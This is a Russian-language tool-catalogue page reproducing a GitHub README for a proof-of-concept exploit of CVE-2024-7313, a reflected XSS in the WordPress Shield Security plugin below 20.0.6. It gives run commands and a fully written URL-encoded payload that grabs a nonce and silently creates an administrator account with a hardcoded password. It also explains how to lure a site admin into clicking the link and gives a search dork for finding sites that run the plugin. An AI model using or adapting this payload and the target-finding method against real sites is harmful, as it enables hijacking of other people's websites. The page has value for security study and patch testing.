Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-7313 — Собственный Proof-of-Concept по XSS для несанкционированного создания учётной записи администратора через плагин WordPress Shield Security < 20.0.6 | Kitploit
Инструменты/GitHubGitHub/wayne-ker/cve-2024-7313
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubwayne-ker/cve-2024-7313

CVE-2024-7313

Собственный Proof-of-Concept по XSS для несанкционированного создания учётной записи администратора через плагин WordPress Shield Security < 20.0.6

Репозиторий
312 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Эксплойт уязвимости плагина Shield Security (CVE-2024-7313)

Kali Linux Works on My Machine Sleep Deprivation

Обзор

Этот репозиторий содержит Python-PoC-скрипт, предназначенный для эксплуатации отражённой XSS-уязвимости в плагине Shield Security для WordPress, затрагивающей версии ниже 20.0.6. Уязвимость (CVE-2024-7313) позволяет атакующему создать специальную вредоносную ссылку для конкретной цели: когда администратор нажимает на неё, эксплойт через XSS создаёт несанкционированную учётную запись администратора. Скрипт автоматически обнаруживает уязвимые установки и генерирует полезную нагрузку для эксплуатации уязвимости.

Информация об уязвимости

  • CVE: CVE-2024-7313
  • Плагин: Shield Security < 20.0.6
  • Серьёзность: Высокая
  • Затронутые системы: Сайты WordPress, использующие плагин Shield Security версий < 20.0.6
  • Тип атаки: Отражённый межсайтовый скриптинг (XSS)
  • Дата публикации: 7 августа 2024 года
  • OWASP TOP-10: A7: Межсайтовый скриптинг (XSS)

Использование

Предварительные требования

  • Python 3.x
  • библиотеки requests и beautifulsoup4

Установите необходимые библиотеки, выполнив:

root@kitploit:~
pip install requests beautifulsoup4

Запуск скрипта

  1. Клонируйте репозиторий:
root@kitploit:~
git clone https://github.com/Wayne-Ker/CVE-2024-7313.git
cd CVE-2024-7313
  1. Запустите скрипт, указав URL цели:
root@kitploit:~
python3 exploit.py <target_url>

Пример:

root@kitploit:~
python3 exploit.py http://127.0.0.1

После ввода необходимых данных для нового пользователя-администратора (имя пользователя, email, имя, фамилия) скрипт сгенерирует URL с полезной нагрузкой. Вы можете вставить этот URL в свой браузер, чтобы выполнить атаку с отражённым XSS, которая создаст нового администратора на сайте WordPress.

  1. Пример вывода:
root@kitploit:~
#############################################################################
#                                                                           #
#                                                                           #
#   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #
#  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // |___ /  #
# | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #
# | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #
#  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #
#                                                                           #
#    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #
#    Reflected XSS in WordPress Shield Security Plugin                      #
#    Versions Affected: < 20.0.6                                            #
#    Risk: High                                                             #
#    Developed by: Wayne-Kerr                                              #
#    Published: August 7, 2024                                              #
############################################################################# 
Shield Security version is vulnerable. Let's continue.
Enter username: fakename
Enter email: [email protected]
Enter first name: Haxor
Enter last name: test

Using hardcoded password: HaxorStrongAFPassword123!!

Generated XSS Payload URL: http://127.0.0.1/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=%3Cscript%3Evar%20xhrNonce%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhrNonce.open%28%27GET%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhrNonce.onload%20%3D%20function%28%29%20%7B%20if%20%28xhrNonce.status%20%3D%3D%3D%20200%29%20%7B%20var%20nonce%20%3D%20xhrNonce.responseText.match%28/name%3D%22_wpnonce_create-user%22%20value%3D%22%28%5Ba-zA-Z0-9%5D%2B%29%22/%29%5B1%5D%3B%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhr.open%28%27POST%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhr.setRequestHeader%28%27Content-Type%27%2C%20%27application/x-www-form-urlencoded%27%29%3B%20xhr.setRequestHeader%28%27Referer%27%2C%20%27http%3A//127.0.0.1/wp-admin/user-new.php%27%29%3B%20xhr.setRequestHeader%28%27Origin%27%2C%20%27http%3A//127.0.0.1%27%29%3B%20var%20params%20%3D%20%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%20%2B%20nonce%20%2B%20%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%26user_login%3Dnick%26email%3Dnick%2540test.com%26first_name%3Dnick%26last_name%3Dtest%26url%3Dtest%26pass1%3DHaxorStrongAFPassword123%2521%2521%26pass2%3DHaxorStrongAFPassword123%2521%2521%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B%20xhr.send%28params%29%3B%20xhr.onload%20%3D%20function%28%29%20%7B%20if%20%28xhr.status%20%3D%3D%20200%29%20%7B%20console.log%28%27Admin%20user%20created%20successfully%27%29%3B%20window.location.href%20%3D%20%27http%3A//127.0.0.1/wp-admin/admin.php%3Fpage%3Dicwp-wpsf-plugin%26nav%3Ddashboard%26nav_sub%3Doverview%27%3B%20%7D%20else%20%7B%20console.log%28%27Error%20occurred%3A%20%27%20%2B%20xhr.statusText%29%3B%20%7D%20%7D%3B%20%7D%20else%20%7B%20console.log%28%27Error%20fetching%20nonce%3A%20%27%20%2B%20xhrNonce.statusText%29%3B%20%7D%20%7D%3B%20xhrNonce.send%28%29%3B%3C/script%3E

После перехода по сгенерированному URL с полезной нагрузкой эксплойт будет выполнен, и на целевом сайте WordPress будет создан новый пользователь-администратор.

Меню справки

Вы можете открыть меню справки, выполнив:

root@kitploit:~
python3 exploit.py -h

Дорк для поиска уязвимых сайтов

Чтобы найти сайты, использующие уязвимый плагин, вы можете воспользоваться следующим дорком:

root@kitploit:~
inurl:"/wp-content/plugins/wp-simple-firewall/"

Это поможет вам найти сайты, на которых установлен плагин Shield Security. Обратите внимание, что номер версии не виден публично, поэтому может потребоваться ручная проверка.

Принцип работы

  • Сначала скрипт проверяет, использует ли целевая установка WordPress уязвимую версию плагина Shield Security, анализируя ответ страницы wp-login.php.
  • Если версия плагина уязвима, скрипт переходит к генерации полезной нагрузки с отражённым XSS, которая при выполнении создаст нового администратора с жёстко заданным паролем.
  • Полезная нагрузка создаётся таким образом, чтобы сначала выполнить GET-запрос для динамического поиска nonce WordPress, используемого при создании учётной записи, а затем использовать этот nonce для отправки POST-запроса к конечной точке создания пользователя с данными нового пользователя, указанными в скрипте.
  • Затем полезная нагрузка URL-кодируется и выводится для использования в атаке.
  • После отправки ссылки администратору сайта и перехода по ней на сайте будет создан новый пользователь с правами администратора с данными, переданными в скрипт. Всё это происходит в фоновом режиме, а обманутый администратор перенаправляется на панель управления Shield Security, не подозревая о выполняющемся в фоне эксплойте.

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей и должен использоваться исключительно в авторизованных средах тестирования на проникновение. Несанкционированный доступ или использование систем, которые вам не принадлежат, является незаконным. Автор не несёт ответственности за любое неправомерное использование этого инструмента.

Лицензия

Этот проект распространяется по лицензии MIT.

Скачать инструмент